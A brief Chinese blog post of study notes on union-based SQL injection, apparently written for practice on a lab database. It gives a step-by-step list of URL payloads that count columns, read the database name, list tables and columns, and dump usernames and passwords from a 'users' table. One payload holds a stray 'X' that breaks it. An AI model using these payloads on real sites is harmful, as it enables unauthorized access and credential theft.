sql 总结

时间：2020-07-22 01:07:17 阅读：77 评论：0 收藏：0 [点我收藏+]

一、有回显

1、边缘试探列数,

?id=1‘ order by X --+

2、查看当前库名

?id=-1‘ union select 1,2,X database() --+

3、显示当前数据库的表名

?id=-1‘ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘XXXX‘ --+

4、判断表名，显示段名

?id=-1‘ union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=‘security‘ and table_name=‘users‘ --+

5、显示用户名密码

?id=-1‘ union select 1,2,group_concat(username,":",password) from users --+

原文：https://www.cnblogs.com/zxnimud/p/13357741.html

踩

(0)

评论一句话评论（0）

分享档案

更多>